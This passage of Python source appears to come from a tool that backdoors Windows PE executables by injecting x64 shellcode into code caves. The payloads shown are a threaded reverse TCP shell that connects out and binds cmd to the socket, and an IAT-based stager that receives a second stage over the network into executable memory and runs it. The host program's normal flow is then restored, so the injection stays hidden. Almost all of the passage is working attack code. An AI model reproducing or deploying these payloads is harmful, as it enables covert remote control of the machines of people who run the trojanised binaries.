"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xff\xd5" # call rbp ; WSAStartup(0x0101, &WSAData);
"\x50" # push rax
"\x50" # push rax
"\x4D\x31\xC0" # xor r8, r8
"\x4D\x31\xC9" # xor r9, r9
"\x48\xff\xC0" # inc rax
"\x48\x89\xC2" # mov rdx, rax
"\x48\xff\xC0" # inc rax
"\x48\x89\xC1" # mov rdx, rax
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\xD4" # call r12 ;WSASocketA(AF_INT, SOCK_STREAM, 0 0 0 0)
"\x49\x94" # xchg r12, rax ; mov socket to r12
# get connect
"\x48\xBA\x63\x6F\x6E\x6E\x65\x63\x74\x00" # mov rdx, "connect\x00"
"\x52" # push rdx
"\x48\x89\xE2" # mov rdx, rsp
"\x4C\x89\xE9" # mov rcx, r13; ws2_32 handle
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] ;GetProcAddr connect
"\x48\x89\xC3" # mov rbx, rax ;connect api
"\x6A\x10" # push 16
"\x41\x58" # pop r8
"\x48\x89\xFA" # mov rdx, rdi
"\x4C\x89\xE1" # mov rcx, r12
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xFF\xD3" # call rbx ;connect (s, &sockaddr, 16)
)
#socket is in r12
self.shellcode2 += ("\xeb\x09" # jump over kernel32
"\x6b\x65\x72\x6e\x65\x6c\x33\x32\x00" # kernel32,00
"\x48\x8D\x0D\xF0\xFF\xFF\xFF" # lea rcx, [rip-4]
"\x48\x83\xEC\x20" # sub rsp, 20
"\x41\xFF\x16" # call qword ptr [r14]
# getprocaddress CreateProcessA
"\x49\x89\xC5" # mov r13, rax ; mov kernel32 to r13
"\x48\x89\xC1" # mov rcx, rax
"\xeb\x0f" # jump over CreateProcessA,0
"\x43\x72\x65\x61\x74\x65\x50" # CreateProcessA
"\x72\x6f\x63\x65\x73\x73\x41\x00" # ...
"\x48\x8D\x15\xEA\xFF\xFF\xFF" # lea rdx, [rip - 22]
"\x48\x83\xEC\x20" # sub rsp, 20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr CreateProcessA
# CreateProcessesA in rax
"\x48\x89\xC7" # mov rdi, rax ;mov CreateProcessA to rdi
"\x49\x87\xFC" # xchg r12, rdi (socket handle for CreateProcessA)
# socket is in rdi
# shell:
"\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00" # mov r8, 'cmd'
"\x41\x50" # push r8 ; an extra push for alignment
"\x41\x50" # push r8 ; push our command line: 'cmd',0
"\x48\x89\xe2" # mov rdx, rsp ; save a pointer to the command line
"\x57" # push rdi ; our socket becomes the shells hStdError
"\x57" # push rdi ; our socket becomes the shells hStdOutput
"\x57" # push rdi ; our socket becomes the shells hStdInput
"\x4d\x31\xc0" # xor r8, r8 ; Clear r8 for all the NULL's we need to push
"\x6a\x0d" # push byte 13 ; We want to place 104 (13 * 8) null bytes onto the stack
"\x59" # pop rcx ; Set RCX for the loop
# 1 push_loop: ;
"\x41\x50" # push r8 ; push a null qword
"\xe2\xfc" # loop push_loop ; keep looping untill we have pushed enough nulls
"\x66\xc7\x44\x24\x54\x01\x01" # mov word [rsp+84], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
"\x48\x8d\x44\x24\x18" # lea rax, [rsp+24] ; Set RAX as a pointer to our STARTUPINFO Structure
"\xc6\x00\x68" # mov byte [rax], 104 ; Set the size of the STARTUPINFO Structure
"\x48\x89\xe6" # mov rsi, rsp ; Save the pointer to the PROCESS_INFORMATION Structure
# ; 1 perform the call to CreateProcessA
"\x56" # push rsi ; Push the pointer to the PROCESS_INFORMATION Structure
"\x50" # push rax ; Push the pointer to the STARTUPINFO Structure
"\x41\x50" # push r8 ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
"\x41\x50" # push r8 ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
"\x41\x50" # push r8 ; We dont specify any dwCreationFlags
"\x49\xff\xc0" # inc r8 ; Increment r8 to be one
"\x41\x50" # push r8 ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
"\x49\xff\xc8" # dec r8 ; Decrement r8 (third param) back down to zero
"\x4d\x89\xc1" # mov r9, r8 ; Set fourth param, lpThreadAttributes to NULL
# ; r8 = lpProcessAttributes (NULL)
# ; rdx = the lpCommandLine to point to "cmd",0
"\x4c\x89\xc1" # mov rcx, r8 ; Set lpApplicationName to NULL as we are using the command line param instead
"\x48\x83\xEC\x20" # sub rsp, 20
"\x41\xFF\xD4" # call r12 ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi );
# perform the call to WaitForSingleObject
"\xeb\x14" # jmp over WaitForSingleObject
"\x57\x61\x69\x74\x46\x6f\x72\x53" # WaitForSingleObject
"\x69\x6e\x67\x6c\x65\x4f\x62\x6a" # ...
"\x65\x63\x74\x00" # ...
"\x48\x8D\x15\xE5\xFF\xFF\xFF" # lea rdx, [rip-27]
"\x4C\x89\xE9" # mov rcx, r13 ; mov kernel32 handle to rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr WaitForSingleObject
# WaitForSingleObject is in rax
"\x48\x31\xd2" # xor rdx, rdx
"\x48\xFF\xCA" # dec rdx
"\x8b\x0e" # mov ecx, dword [rsi] ; set the first param to the handle from our PROCESS_INFORMATION.hProcess
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xFF\xD0" # call rax; WaitForSingleObject( pi.hProcess, INFINITE );
#Fix Up rsp
#"\x48\x81\xC4\x08\x04\x00\x00" # add rsp, 490
)
# ADD EXITFUNC HERE THREAD
#kernel32 handle in r13
#LoadLibraryA in r14
#GetProcAddress in r15
# just try exitthread...
self.shellcode2 += ("\xeb\x0b"
"\x47\x65\x74\x56\x65"
"\x72\x73\x69\x6f\x6e\x00" # GetVersion
"\x48\x8D\x15\xEE\xFF\xFF\xFF" # lea rdx, [rip-16]
"\x4C\x89\xE9" # mov rcx, r13 ; mov kernel32 handle to rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr GetVersion
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xff\xd0" # call rax (getversion)
"\x83\xf8\x06" # cmp al, 6
"\x7d\x19" # jl short to ntdll
"\xeb\x0b"
"\x45\x78\x69\x74\x54" # ...
"\x68\x72\x65\x61\x64\x00" # ExitThread
"\x48\x8D\x15\xEE\xFF\xFF\xFF" # lea rdx, [rip -16]
"\x4C\x89\xE9" # mov rcx, r13 ..add mov kernel32 to rcx
"\xeb\x34" # jmp short to su rsp for getprocaddress
"\xeb\x06" # jmp short over ntdll
"\x6e\x74\x64\x6c\x6c\x00" # ntdll
"\x48\x8D\x0D\xF3\xFF\xFF\xFF" # lea rcx, [rip -13]
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xff\x16" # call qword ptr [r14] LoadlibA ntdll
"\x48\x89\xc1" # mov rcx, rax
"\xeb\x12" # jmp over RtlExitUserThread
"\x52\x74\x6c\x45\x78\x69\x74\x55\x73" # RtlExitUserThread
"\x65\x72\x54\x68\x72\x65\x61\x64\x00" # ...
"\x48\x8D\x15\xE7\xFF\xFF\xFF" # lea rdx, [rip -16]
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr RtlExitUserThread or ExitThread
"\x48\x31\xc9" # xor rcx, rcx
"\xff\xd0" # call rax
)
#Virtual ALLOC Code BELOW
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\x90" # <--THAT'S A NOP. \o/
"\xe8\xc0\x00\x00\x00" # jmp to allocate
#api_call
"\x41\x51" # push r9
"\x41\x50" # push r8
"\x52" # push rdx
"\x51" # push rcx
"\x56" # push rsi
"\x48\x31\xD2" # xor rdx,rdx
"\x65\x48\x8B\x52\x60" # mov rdx,qword ptr gs:[rdx+96]
"\x48\x8B\x52\x18" # mov rdx,qword ptr [rdx+24]
"\x48\x8B\x52\x20" # mov rdx,qword ptr[rdx+32]
#next_mod
"\x48\x8b\x72\x50" # mov rsi,[rdx+80]
"\x48\x0f\xb7\x4a\x4a" # movzx rcx,word [rdx+74]
"\x4d\x31\xc9" # xor r9,r9
#loop_modname
"\x48\x31\xc0" # xor rax,rax
"\xac" # lods
"\x3c\x61" # cmp al, 61h (a)
"\x7c\x02" # jl 02
"\x2c\x20" # sub al, 0x20
#not_lowercase
"\x41\xc1\xc9\x0d" # ror r9d, 13
"\x41\x01\xc1" # add r9d, eax
"\xe2\xed" # loop until read, back to xor rax, rax
"\x52" # push rdx ; Save the current position in the module list for later
"\x41\x51" # push r9 ; Save the current module hash for later
# ; Proceed to itterate the export address table,
"\x48\x8b\x52\x20" # mov rdx, [rdx+32] ; Get this modules base address
"\x8b\x42\x3c" # mov eax, dword [rdx+60] ; Get PE header
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address
"\x8b\x80\x88\x00\x00\x00" # mov eax, dword [rax+136] ; Get export tables RVA
"\x48\x85\xc0" # test rax, rax ; Test if no export address table is present
"\x74\x67" # je get_next_mod1 ; If no EAT present, process the next module
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address
"\x50" # push rax ; Save the current modules EAT
"\x8b\x48\x18" # mov ecx, dword [rax+24] ; Get the number of function names
"\x44\x8b\x40\x20" # mov r8d, dword [rax+32] ; Get the rva of the function names
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
#; Computing the module hash + function hash
#get_next_func: ;
"\xe3\x56" # jrcxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
"\x48\xff\xc9" # dec rcx ; Decrement the function name counter
"\x41\x8b\x34\x88" # mov esi, dword [r8+rcx*4]; Get rva of next module name
"\x48\x01\xd6" # add rsi, rdx ; Add the modules base address
"\x4d\x31\xc9" # xor r9, r9 ; Clear r9 which will store the hash of the function name
# ; And compare it to the one we wan
#loop_funcname: ;
"\x48\x31\xc0" # xor rax, rax ; Clear rax
"\xac" # lodsb ; Read in the next byte of the ASCII function name
"\x41\xc1\xc9\x0d" # ror r9d, 13 ; Rotate right our hash value
"\x41\x01\xc1" # add r9d, eax ; Add the next byte of the name
"\x38\xe0" # cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
"\x75\xf1" # jne loop_funcname ; If we have not reached the null terminator, continue
"\x4c\x03\x4c\x24\x08" # add r9, [rsp+8] ; Add the current module hash to the function hash
"\x45\x39\xd1" # cmp r9d, r10d ; Compare the hash to the one we are searchnig for
"\x75\xd8" # jnz get_next_func ; Go compute the next function hash if we have not found it
# ; If found, fix up stack, call the function and then value else compute the next one...
"\x58" # pop rax ; Restore the current modules EAT
"\x44\x8b\x40\x24" # mov r8d, dword [rax+36] ; Get the ordinal table rva
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
"\x66\x41\x8b\x0c\x48" # mov cx, [r8+2*rcx] ; Get the desired functions ordinal
"\x44\x8b\x40\x1c" # mov r8d, dword [rax+28] ; Get the function addresses table rva
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
"\x41\x8b\x04\x88" # mov eax, dword [r8+4*rcx]; Get the desired functions RVA
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address to get the functions actual VA
#; We now fix up the stack and perform the call to the drsired function...
#finish:
"\x41\x58" # pop r8 ; Clear off the current modules hash
"\x41\x58" # pop r8 ; Clear off the current position in the module list
"\x5E" # pop rsi ; Restore RSI
"\x59" # pop rcx ; Restore the 1st parameter
"\x5A" # pop rdx ; Restore the 2nd parameter
"\x41\x58" # pop r8 ; Restore the 3rd parameter
"\x41\x59" # pop r9 ; Restore the 4th parameter
"\x41\x5A" # pop r10 ; pop off the return address
"\x48\x83\xEC\x20" # sub rsp, 32 ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
# ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
"\x41\x52" # push r10 ; push back the return address
"\xFF\xE0" # jmp rax ; Jump into the required function
# ; We now automagically return to the correct caller...
#get_next_mod: ;
"\x58" # pop rax ; Pop off the current (now the previous) modules EAT
#get_next_mod1: ;
"\x41\x59" # pop r9 ; Pop off the current (now the previous) modules hash
"\x5A" # pop rdx ; Restore our position in the module list
"\x48\x8B\x12" # mov rdx, [rdx] ; Get the next module
"\xe9\x57\xff\xff\xff" # jmp next_mod ; Process this module
)
#allocate
self.shellcode1 += ("\x5d" # pop rbp
"\x49\xc7\xc6" # mov r14, 1abh size of payload...
)
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
self.shellcode1 += ("\x6a\x40" # push 40h
"\x41\x59" # pop r9 now 40h
"\x68\x00\x10\x00\x00" # push 1000h
"\x41\x58" # pop r8.. now 1000h
"\x4C\x89\xF2" # mov rdx, r14
"\x6A\x00" # push 0
"\x59" # pop rcx
"\x68\x58\xa4\x53\xe5" # push E553a458
"\x41\x5A" # pop r10
"\xff\xd5" # call rbp
"\x48\x89\xc3" # mov rbx, rax ; Store allocated address in ebx
"\x48\x89\xc7" # mov rdi, rax ; Prepare EDI with the new address
)
##mov rcx, 0x1ab
self.shellcode1 += "\x48\xc7\xc1"
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
#call the get_payload right before the payload
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x43"
# got_payload:
self.shellcode1 += ("\x5e" # pop rsi ; Prepare ESI with the source to copy
"\xf2\xa4" # rep movsb ; Copy the payload to RWX memory
"\xe8\x00\x00\x00\x00" # call set_handler ; Configure error handling
#set_handler:
"\x48\x31\xC0" # xor rax,rax
"\x50" # push rax ; LPDWORD lpThreadId (NULL)
"\x50" # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" # mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
"\x49\x89\xD8" # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" # mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
"\x49\xC7\xC2\x38\x68\x0D\x16" # mov r10, 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
"\xFF\xD5" # call rbp ; Spawn payload thread
"\x48\x83\xC4\x58" # add rsp, 50
#stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
)
breakupvar = eat_code_caves(flItms, 0, 2)
#Jump to the win64 return to normal execution code segment.
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip('L')), 16))
else:
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def iat_reverse_tcp_stager_threaded(self, flItms, CavesPicked={}):
"""
Completed IAT based payload includes spawning of thread.
"""
flItms['stager'] = True
flItms['apis_needed'] = ['LoadLibraryA', 'GetProcAddress',
'VirtualAlloc', 'CreateThread']
for api in flItms['apis_needed']:
if api not in flItms:
return False
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
#overloading the class stackpreserve
self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
breakupvar = eat_code_caves(flItms, 0, 1)
#get_payload: #Jump back with the address for the payload on the stack.
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 99).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 99).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 71).rstrip('L')), 16))
else:
self.shellcode2 = "\xE8\xBA\xFF\xFF\xFF"
#Can inject any shellcode below.
if flItms['NewCodeCave'] is False:
if CavesPicked != {}:
self.shellcode2 += self.clean_caves_stub(flItms['CavesToFix'])
else:
self.shellcode2 += "\x41" * 90
self.shellcode2 += "\xfc" # CLD
self.shellcode2 += "\x55\x48\x89\xE5" # mov rbp, rsp
self.shellcode2 += "\x48\x31\xD2" # xor rdx, rdx
self.shellcode2 += "\x65\x48\x8B\x52\x60" # mov rdx, QWORD ptr gs: [rdx+0x60]
self.shellcode2 += "\x48\x8B\x52\x10" # mov rdx, Qword ptr [rdx + 10]
# rdx now module entry
self.shellcode2 += "\x49\xBE" # mov value below to r14
if flItms['LoadLibraryA'] - flItms['ImageBase'] < 0:
self.shellcode2 += struct.pack("<Q", 0xffffffff + (flItms['LoadLibraryA'] - flItms['ImageBase'] + 1))
else:
self.shellcode2 += struct.pack("<Q", flItms['LoadLibraryA'] - flItms['ImageBase'])
#RDX holds entry point
self.shellcode2 += "\x49\x01\xD6" # add r14 + RDX
self.shellcode2 += "\x49\xBF" # mov value below to r15
if flItms['GetProcAddress'] - flItms['ImageBase'] < 0:
self.shellcode2 += struct.pack("<Q", 0xffffffff + (flItms['GetProcAddress'] - flItms['ImageBase'] + 1))
else:
self.shellcode2 += struct.pack("<Q", flItms['GetProcAddress'] - flItms['ImageBase'])
self.shellcode2 += "\x49\x01\xD7" # add r15 + RDX
# LoadLibraryA in r14
# GetProcAddress in r15
self.shellcode2 += ("\x49\xbb\x77\x73\x32\x5F\x33\x32\x00\x00" # mov r11, ws2_32
"\x41\x53" # push r11
"\x49\x89\xE3" # mov r11, rsp
"\x48\x81\xEC\xA0\x01\x00\x00" # sub rsp, 408+8 # size of WSAData
"\x48\x89\xE6" # mov rsi, rsp pointer to WSAData struct
"\x48\xBF\x02\x00"
)
self.shellcode2 += struct.pack('!H', self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x57" # push rdi
"\x48\x89\xE7" # mov rdi, rsp pointer to data
"\x4C\x89\xD9" # mov rcx, r11 #ws2_32
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xff\x16" # call qword ptr [r14] ; LoadLibA
"\x49\x89\xC5" # mov r13, rax ; handle ws2_32 to r13
# handle ws2_32 to r13
"\x48\x89\xC1" # mov rcx, rax
"\xeb\x0c" # short jmp over api
"\x57\x53\x41\x53\x74\x61" # WSAStartup
"\x72\x74\x75\x70\x00\x00" # ...
"\x48\x8D\x15\xED\xFF\xFF\xFF" # lea rdx, [rip-19]
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # Call qword ptr [r15] ; GetProcAddr
"\x48\x95" # xchg rbp, rax ; mov wsastartup to rbp
# wsastartup to rbp
"\xeb\x0c" # jmp over WSASocketA
"\x57\x53\x41\x53\x6f\x63" # WSASocketA
"\x6b\x65\x74\x41\x00\x00" #
"\x48\x8D\x15\xED\xFF\xFF\xFF" # lea rdx, [rip-19]
"\x4C\x89\xE9" # mov rcx, r13
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr WSASocketA
"\x49\x94" # xchg r12, rax ; mov WSASocketA to r12
# WSASocketA to r12
"\x48\x89\xF2" # mov rdx, rsi ; mov point to struct
"\x68\x01\x01\x00\x00" # push 0x0101
"\x59" # pop rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xff\xd5" # call rbp ; WSAStartup(0x0101, &WSAData);
"\x50" # push rax
"\x50" # push rax
"\x4D\x31\xC0" # xor r8, r8
"\x4D\x31\xC9" # xor r9, r9
"\x48\xff\xC0" # inc rax
"\x48\x89\xC2" # mov rdx, rax
"\x48\xff\xC0" # inc rax
"\x48\x89\xC1" # mov rdx, rax
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\xD4" # call r12 ;WSASocketA(AF_INT, SOCK_STREAM, 0 0 0 0)
"\x49\x94" # xchg r12, rax ; mov socket to r12
# get connect
"\x48\xBA\x63\x6F\x6E\x6E\x65\x63\x74\x00" # mov rdx, "connect\x00"
"\x52" # push rdx
"\x48\x89\xE2" # mov rdx, rsp
"\x4C\x89\xE9" # mov rcx, r13; ws2_32 handle
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] ;GetProcAddr connect
"\x48\x89\xC3" # mov rbx, rax ;connect api
"\x6A\x10" # push 16
"\x41\x58" # pop r8
"\x48\x89\xFA" # mov rdx, rdi
"\x4C\x89\xE1" # mov rcx, r12
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xFF\xD3" # call rbx ;connect (s, &sockaddr, 16)
)
# socket is in r12
# rdi has the struct for the socket
# r14: GetProcAddress
# r15: LoadLibraryA
# r13 has ws2_32 handle
# reminder: RCX, RDX, R8, R9 for the first four integer or pointer arguments
self.shellcode2 += ("\x90\x90\x90\x90"
#get recv handle
"\x4C\x89\xE9" # mov rcx, r13 ; ws2_32 handle in rcx
"\x48\xBA\x72\x65\x63\x76\x00\x00\x00\x00" # mov rdx, recv
"\x52" # push rdx
"\x48\x89\xe2" # mov rdx, rsp
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15]; getprocaddr recv
"\x49\x89\xC5" # mov r13, rax ; don't need ws2_32 handle
"\x48\x81\xC4\xD0\x02\x00\x00" # add rsp, 0x2F8
"\x48\x83\xec\x10" # sub rsp, 16
"\x48\x89\xe2" # mov rdx, rsp
"\x4D\x31\xC9" # xor r9, r9
"\x6a\x04" # push byte 0x4
"\x41\x58" # pop r8
"\x4C\x89\xE1" # mov rcx, r12; socket
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\xD5" # call r13; recv
"\x48\x83\xC4\x20" # add rsp, 32 ;need to restore the stack
"\x5e" # pop rsi ; size of second stage
)
self.shellcode2 += ("\x48\x31\xD2" # xor rdx, rdx
"\x65\x48\x8B\x52\x60" # mov rdx, QWORD ptr gs: [rdx+0x60]
"\x48\x8B\x52\x10" # mov rdx, QWORD ptr [rdx + 10]
)
# rdx now module entry
self.shellcode2 += "\x49\xBE" # mov value below to r14
if flItms['VirtualAlloc'] - flItms['ImageBase'] < 0:
self.shellcode2 += struct.pack("<Q", 0xffffffff + (flItms['VirtualAlloc'] - flItms['ImageBase'] + 1))
else:
self.shellcode2 += struct.pack("<Q", flItms['VirtualAlloc'] - flItms['ImageBase'])
self.shellcode2 += "\x49\x01\xD6" # add r14 + RDX
# r14 now holds VirtualAlloc
self.shellcode2 += ("\x6a\x40" # push byte 0x40
"\x41\x59" # pop r9
"\x68\x00\x10\x00\x00" # push 0x1000
"\x41\x58" # pop r8
"\x48\x89\xf2" # mov rdx, rsi
"\x48\x31\xc9" # xor rcx, rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xff\x16" # call r14; call VirtualAlloc
"\x48\x89\xc3" # mov rbx, rax
"\x49\x89\xC7" # mov r15, rax
"\x4D\x31\xC9" # xor r9, r9
"\x49\x89\xF0" # mov r8, rsi
"\x48\x89\xDA" # mov rdx, rbx
"\x4C\x89\xE1" # mov rcx, r12
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\xD5" # call r13; recv
"\x48\x01\xC3" # add rbx, rax
"\x48\x29\xC6" # sub rsi, rax
"\x48\x85\xF6" # test rsi, rsi
"\x75\xe2" # jnz short -X
"\x4C\x89\xE7" # mov rdi, r12 ; socket to rdi
"\x41\xFF\xE7" # jmp r15
)
breakupvar = eat_code_caves(flItms, 0, 1)
#allocate
self.shellcode1 = "\xfc"
self.shellcode1 += "\x49\xBE" # mov value below to r14
if flItms['VirtualAlloc'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<Q", 0xffffffff + (flItms['VirtualAlloc'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<Q", flItms['VirtualAlloc'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
# RDX holds entry point
self.shellcode1 += "\x49\x01\xD6" # add r14 + RDX
self.shellcode1 += "\x49\xBF" # mov value below to r15
if flItms['CreateThread'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<Q", 0xffffffff + (flItms['CreateThread'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<Q", flItms['CreateThread'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
self.shellcode1 += "\x49\x01\xD7" # add r15 + RDX
# r14 virtualalloc
# r15 createthread
self.shellcode1 += ("\x5d" # pop rbp
"\x49\xc7\xc5" # mov r13, size of payload...
)
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
self.shellcode1 += ("\x6a\x40" # push 40h
"\x41\x59" # pop r9 now 40h
"\x68\x00\x10\x00\x00" # push 1000h
"\x41\x58" # pop r8.. now 1000h
"\x4C\x89\xEA" # mov rdx, r13
"\x6A\x00" # push 0
"\x59" # pop rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x16" # call qword ptr [r14]
"\x48\x89\xc3" # mov rbx, rax ; Store allocated address in rbx
"\x48\x89\xc7" # mov rdi, rax ; Prepare RDI with the new address
)
self.shellcode1 += "\x48\xc7\xc1"
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
#call the get_payload right before the payload
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x41"
# got_payload:
self.shellcode1 += ("\x5e" # pop rsi ; Prepare ESI with the source to copy
"\xf2\xa4" # rep movsb ; Copy the payload to RWX memory
"\xe8\x00\x00\x00\x00" # call set_handler ; Configure error handling
#^^^^ I could delete this need to fix jmp, call, and stack
#set_handler:
"\x48\x31\xC0" # xor rax,rax
"\x50" # push rax ; LPDWORD lpThreadId (NULL)
"\x50" # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" # mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
"\x49\x89\xD8" # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" # mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15]
"\x48\x83\xC4\x50" # add rsp, 50
#stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
)
breakupvar = eat_code_caves(flItms, 0, 2)
#Jump to the win64 return to normal execution code segment.
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip('L')), 16))
else:
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def iat_user_supplied_shellcode_threaded(self, flItms, CavesPicked={}):
"""
Completed IAT based payload includes spawning of thread.
"""
flItms['stager'] = True
flItms['apis_needed'] = ['LoadLibraryA', 'GetProcAddress',
'VirtualAlloc', 'CreateThread']
for api in flItms['apis_needed']:
if api not in flItms:
return False
